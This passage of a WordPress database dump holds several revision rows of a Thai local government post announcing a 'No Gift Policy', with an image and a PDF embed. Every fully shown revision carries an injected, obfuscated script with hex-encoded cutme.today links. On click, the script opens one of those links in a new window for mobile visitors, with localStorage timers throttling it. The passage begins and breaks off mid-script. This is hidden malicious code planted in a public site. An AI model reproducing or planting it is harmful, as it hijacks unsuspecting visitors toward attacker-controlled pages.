Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:38:00','2025-06-09 06:38:00','',859,'http://pakhaeng.ssk.in.th/?p=1304',0,'revision','',0),
(1306,1,'2025-06-09 13:39:27','2025-06-09 06:39:27','<!-- wp:image {\"id\":1298,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/Is-It-a-Gift-Instagram-Post112-1024x256.png\" alt=\"\" class=\"wp-image-1298\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true,\"align\":\"center\"} -->\n<div class=\"wp-block-file aligncenter\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:39:27','2025-06-09 06:39:27','',859,'http://pakhaeng.ssk.in.th/?p=1306',0,'revision','',0),
(1307,1,'2025-06-09 13:39:29','2025-06-09 06:39:29','<!-- wp:image {\"id\":1298,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/Is-It-a-Gift-Instagram-Post112-1024x256.png\" alt=\"\" class=\"wp-image-1298\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true,\"align\":\"center\"} -->\n<div class=\"wp-block-file aligncenter\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:39:29','2025-06-09 06:39:29','',859,'http://pakhaeng.ssk.in.th/?p=1307',0,'revision','',0),
(1308,1,'2025-06-09 13:39:43','2025-06-09 06:39:43','<!-- wp:image {\"id\":1298,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/Is-It-a-Gift-Instagram-Post112-1024x256.png\" alt=\"\" class=\"wp-image-1298\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true,\"align\":\"full\"} -->\n<div class=\"wp-block-file alignfull\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 